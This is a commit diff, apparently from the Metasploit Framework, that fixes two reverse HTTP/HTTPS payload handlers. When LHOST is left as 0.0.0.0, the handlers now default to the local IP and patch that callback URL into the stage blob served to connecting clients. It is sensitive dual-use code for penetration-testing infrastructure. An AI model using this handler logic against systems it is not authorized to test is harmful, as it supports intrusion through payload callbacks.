Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. Solves some integration issues where 0.0.0.0 was accidentally used
git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4d850c1ee6
commit
616913c4c1
|
@ -123,13 +123,21 @@ protected
|
||||||
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
||||||
|
|
||||||
|
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
|
||||||
|
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
|
||||||
|
if lhost.empty? or lhost == '0.0.0.0'
|
||||||
|
lhost = Rex::Socket.source_address(cli.peerhost)
|
||||||
|
end
|
||||||
|
|
||||||
# Process the requested resource.
|
# Process the requested resource.
|
||||||
case req.relative_resource
|
case req.relative_resource
|
||||||
when /^\/INITJM/
|
when /^\/INITJM/
|
||||||
print_line("java: #{req.relative_resource}")
|
print_line("Java: #{req.relative_resource}")
|
||||||
|
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
print_line "URL: #{url.inspect}"
|
print_line "URL: #{url.inspect}"
|
||||||
|
|
||||||
blob = ""
|
blob = ""
|
||||||
|
@ -178,7 +186,7 @@ protected
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
i = blob.index("https://" + ("X" * 256))
|
i = blob.index("https://" + ("X" * 256))
|
||||||
if i
|
if i
|
||||||
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
blob[i, url.length] = url
|
blob[i, url.length] = url
|
||||||
end
|
end
|
||||||
print_status("Patched URL at offset #{i}...")
|
print_status("Patched URL at offset #{i}...")
|
||||||
|
|
|
@ -124,11 +124,18 @@ protected
|
||||||
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
||||||
|
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
|
||||||
|
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
|
||||||
|
if lhost.empty? or lhost == '0.0.0.0'
|
||||||
|
lhost = Rex::Socket.source_address(cli.peerhost)
|
||||||
|
end
|
||||||
|
|
||||||
# Process the requested resource.
|
# Process the requested resource.
|
||||||
case req.relative_resource
|
case req.relative_resource
|
||||||
when /^\/INITJM/
|
when /^\/INITJM/
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
#$stdout.puts "URL: #{url.inspect}"
|
#$stdout.puts "URL: #{url.inspect}"
|
||||||
|
|
||||||
blob = ""
|
blob = ""
|
||||||
|
@ -176,7 +183,7 @@ protected
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
i = blob.index("https://" + ("X" * 256))
|
i = blob.index("https://" + ("X" * 256))
|
||||||
if i
|
if i
|
||||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
blob[i, url.length] = url
|
blob[i, url.length] = url
|
||||||
end
|
end
|
||||||
print_status("Patched URL at offset #{i}...")
|
print_status("Patched URL at offset #{i}...")
|
||||||
|
|
Loading…
Reference in New Issue